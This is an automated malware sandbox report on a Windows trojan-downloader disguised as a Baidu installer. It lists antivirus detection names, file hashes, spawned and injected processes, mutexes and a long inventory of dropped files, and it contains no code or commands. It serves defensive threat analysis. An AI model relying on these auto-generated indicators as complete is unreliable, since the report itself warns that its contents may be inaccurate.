HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Gen:Variant.Symmi.48377 (B) (Emsisoft), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: fb19d727263c37bf685e453975c01269
SHA1: 50f32856e588fe9062cf917375ebabefa6c1d532
SHA256: e675ab1c9a5311a2757858be3bc06a3ef72a5076de100ae055787ce245922a32
SSDeep: 12288:MeBy9Zkt/6gHZeAw76sYmhcjeFbgFgHFv:MeBJcg5YSe9lv
Size: 568144 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-09-29 06:32:48
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1308
Baidu.exe:968
Baidu.exe:1836
Baidu.exe:2540
Baidu.exe:3220
YouQian_Setup.exe:1488
The Trojan injects its code into the following process(es):
%original file name%.exe:856
Baidu_Setup_1.6.200.359_ftn_1050103060.exe:492
Baidu.exe:808
Mutexes
The following mutexes were created/opened:
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFileShimCacheMutex
File activity
The process %original file name%.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EDTTN6HH\7gj1[1] (991986 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F6HGJOR7\7b1[1] (353734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EDTTN6HH\Baidu_Setup_1.6.200.359_ftn_1050103060[1].exe (688653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F6HGJOR7\2k[1] (205033 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EDTTN6HH\uc1[1] (984448 bytes)
The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%WinDir%\Temp\baidu\youqian\桌面百度\process.cfg (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa2.tmp (284894 bytes)
%WinDir%\Temp\baidu\youqian\桌面百度\YouQian_Setup.exe (25112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%WinDir%\Temp\baidu\youqian\桌面百度\桌面百度.ini (1607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\BDMSkin.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\InstallHelper.dll (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%WinDir%\Temp\baidu\youqian\桌面百度\132.exe (172202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp (0 bytes)
The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_x.png (89 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm5.tmp (447624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\349.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Base.dll (77808 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\Software.pb (9984 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall-1.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\arrow.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Utils.dll (23296 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\haze.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\executor.xml (233 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\login\login.html (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-logo57x65.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\InstallHelper.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Update.dll (11040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F6HGJOR7\bdzc_Setup_2.0.3.124[1].dll (18424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-left.png (130 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\PluginSetup.xml (654 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\msgconfig.pb (142 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\icon_xinwen.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-right.png (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\msvcr100.dll (25824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\foggy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\login_mods.js (14 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sleet.png (741 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\pack.bat (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\weixinUI.xml (345 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\request.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-storm.png (926 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download-hover.png (985 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\app-error.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe (18640 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks_z.png (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-rain.png (864 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\BDWebDownload.dll (7192 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\executor.xml (310 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\icon_gupiao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sandstorm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\PluginSetup.xml (625 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo57x65.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\crash.html (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\overcast.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\shower.png (817 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\icon_yinyue.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.woff (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-google.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\mod.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\foggy.png (663 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_m.png (124 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\kuaidi.png (312 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\res_jietu.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dust.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\res_weixin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\default-icon.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dy.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Base.dll (38904 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Protocol.dll (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcr100.dll (51648 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\executor.xml (172 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\advance.png (377 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\44.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\icon_bianqian.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\344.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\respond.min.js (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_m.png (925 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe (13168 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-circle-loading.gif (9 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder.png (276 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\404.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\vedio_play.png (465 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\res_yinyue.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\main.js (1552 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuDll.dll (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AssociateWnd.rdb (1568 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\UIHandler.dll (120372 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-loading.gif (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\banner.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\gupiaoUI.xml (336 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-unchecked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search-large.png (408 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\history_mods.js (6360 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower-with-hail.png (946 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-ala.png (561 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuUI.xml (347 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Update.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\layout.css (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\settings_mods.js (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\DD_belatedPNG_0.0.8a-min.js (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-left.png (194 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianUI.xml (346 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search.png (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\qq.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-rain.png (963 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\executor.xml (241 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\screensnapshot.exe (20624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\shower.png (481 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\super-ajax.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download.png (991 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\xinwenUI.xml (342 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUI.xml (382 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\box-shadow.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\res_resou.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-close.png (170 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\366.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-flurry.png (479 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PluginMgr.dll (49664 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LogicMisc.dll (140990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-textbox.png (588 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcp100.dll (28368 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-alert-ok.png (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\png8-ex.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\resouUI.xml (340 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\aladdin.html (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\auto_complete\top_site.db (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox-active.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-left.png (249 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\map.js (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\executor.xml (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\msvcp100.dll (14184 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\yinyueUI.xml (358 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\png8-iconall-1.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-ui-1.10.4.custom.min.js (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\login-success.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\res\js\common.js (990 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login.css (7 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\res_xinwen.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\1px.png (947 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\363.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo_blank.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\music_play.png (155 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sunny.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\PluginSetup.xml (622 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings.css (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-right.png (259 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-center.png (143 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general-png8.png (841 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\res_bianqian.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\skinres.rdb (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\new.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-1.11.1.min.js (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\gray1px.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download-hover.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall.gif (94 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\json2.js (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\privacy.png (296 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ice-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PWidgetAppCommonBase.dll (14384 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\rpt.dat (222 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login_z.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\MsgPush.dll (31072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\iframe_loading.gif (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\input.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\favicon.ico (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-unchecked.png (361 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\testIO.exe (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\AppHTMLXinWen.xml (442 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Setting.rdb (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\icon_jietu.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\appBlackList.dat (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\executor.xml (234 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BDSearchBar.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\bookmarks.html (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\global.js (8184 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\PluginSetup.xml (616 bytes)
